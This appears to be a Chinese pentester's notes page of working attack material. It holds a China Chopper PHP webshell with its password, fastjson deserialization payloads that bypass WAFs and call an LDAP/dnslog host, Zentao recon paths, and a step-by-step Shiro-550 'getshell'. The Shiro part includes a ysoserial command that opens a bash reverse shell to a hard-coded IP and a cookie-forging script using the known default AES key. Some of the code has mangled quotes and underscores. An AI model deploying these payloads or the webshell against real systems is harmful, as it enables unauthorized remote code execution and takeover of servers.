菜刀马
<?php
@$a = $_POST['Hello'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
密码是Hello,虽然base64解码的内容是[@eval(base64_decode($_POST[z0]));],但是密码就是Hello而不是z0。另外,菜刀马的密码不能是z0-z9。
fastjson
绕waf的payload:
{“name”:{“\u0040\u0074\u0079\u0070\u0065”:”\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073”,”\u0076\u0061\u006c”:”\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c”},”x”:{“\u0040\u0074\u0079\u0070\u0065”:”\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c”,”\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065”:”ldap://986pf8.dnslog.cn”,”autoCommit”:true}}
{“@type”:”java.lang.Exception”,”@type”:”com.fastjson.demo.poc.poc”,”s”:”calc”}
fastjson精确获取版本:
post包内容:
{“@type”: “java.lang.AutoCloseable”
[
“a”:””
;
{“@type”:”java.net.Inet4Address”,”val”:”dnslog”}
{“@type”:”java.net.Inet6Address”,”val”:”dnslog”}
畸形:
{“@type”:”java.net.InetSocketAddress”{“address”:,”val”:”这里是dnslog”}} “@type”:”java.net.InetSocketAddress”{“address”:,”val”:”这里是dnslog”}} [“@Type”:”Java.Net.InetSocketAddress”{“address”:,”Val”:”Zhèlǐ shì dnslog”}}]”@Type”: “java.net.InetSocketAddress” { “address”:, “val”: “This is dnslog”}}
来自 [https://blog.csdn.net/SuPejkj/article/details/109190901](https://blog.csdn.net/SuPejkj/article/details/109190901)
jackjson
大致判断版本:
1.x的类库中,包命名以:org.codehaus.jackson.xxx开头,而2.x类库中包命名:com.fastxml.jackson.xxx开头
禅道看版本
看版本:/zentao/index.php?mode=getconfig
登陆口:/zentao/user-login-L3plbnRhby8=.html
手动shiro
一、Shiro-550-手工getshell
- 首先是要准备好ysoserial-master.jar。
- 第一步在vps上开启 JRMP 监听:java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 ‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjE1Ljk0LjEwNy8xODg4IDA+JjE=}|{base64,-d}|{bash,-i}’,其中base64的内容为bash -i >& /dev/tcp/1.15.94.107/1888 0>&1。
- 第二步在vps上监听1888端口,nc -lvvp 1888。
- 第三步生成payload:python shiro-exp.py vps:1099。其中,shiro-exp.py的内容为:
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encoderememberme(command):
popen = subprocess.Popen([‘java’, ‘-jar’, ‘ysoserial-master.jar’, ‘JRMPClient’, command], stdout=subprocess.PIPE)
BS = AES.blocksize
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode(“kPH+bIxk5D2deZiIxcaaaA==”)
#key = base64.b64decode(“Z3VucwAAAAAAAAAAAAAAAA==”)
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODECBC, iv)
filebody = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name == ‘__main‘:
payload = encode_rememberme(sys.argv[1])
print(“rememberMe={0}”.format(payload.decode()))
其中的秘钥如果需要请替换。